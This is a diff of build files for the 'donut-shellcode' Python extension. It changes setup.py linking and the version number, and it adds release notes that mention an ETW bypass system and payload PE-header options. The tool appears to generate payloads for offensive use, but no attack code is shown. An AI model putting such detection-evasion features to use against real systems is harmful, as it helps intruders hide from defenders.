-4
setup.cfg less more
0 [egg_info]
1 tag_build =
2 tag_date = 0
3
+36
-11
setup.py less more
00 from setuptools import Extension, setup
1 import sys
12
23 with open("README.md", "r") as fh:
34 long_description = fh.read()
45
6 static_libraries = ['aplib64']
7 static_lib_dir = 'lib'
8 libraries = []
9 library_dirs = ['lib']
10 extra_compile_args = []
11 extra_link_args = []
12 extra_objects = []
13 include_dirs = ['include']
14 sources = ['donut.c',
15 'hash.c',
16 'encrypt.c',
17 'format.c',
18 'loader/clib.c',
19 'donutmodule.c']
20
21 if sys.platform == 'win32':
22 libraries.extend(static_libraries)
23 library_dirs.append(static_lib_dir)
24 extra_objects = []
25 elif sys.platform == 'win64':
26 libraries.extend(static_libraries)
27 library_dirs.append(static_lib_dir)
28 extra_objects = []
29 else: # POSIX
30 extra_objects = ['{}/{}.a'.format(static_lib_dir, l) for l in static_libraries]
31
32
533 module = Extension(
634 "donut",
7 include_dirs=[
8 'include'
9 ],
10 sources=[
11 'donut.c',
12 'hash.c',
13 'encrypt.c',
14 'payload/clib.c',
15 'donutmodule.c'
16 ]
35 include_dirs = include_dirs,
36 sources = sources,
37 libraries = libraries,
38 library_dirs = library_dirs,
39 extra_compile_args = extra_compile_args,
40 extra_link_args = extra_link_args,
41 extra_objects = extra_objects,
1742 )
1843
1944 setup(
2045 name='donut-shellcode',
21 version='0.9.2',
46 version='0.9.3',
2247 description='Donut Python C extension',
2348 long_description=long_description,
2449 long_description_content_type="text/markdown",
+3
-0
version-release-notes.txt less more
1313 * v1.1:
1414 * Automatic unloading of Application Domains after the Assembly finishes executing.
1515 * Support for HTTP proxies
16 * v2.0:
17 * Added moduler bypass system for ETW
18 * Added option for preserving PE headers of native payloads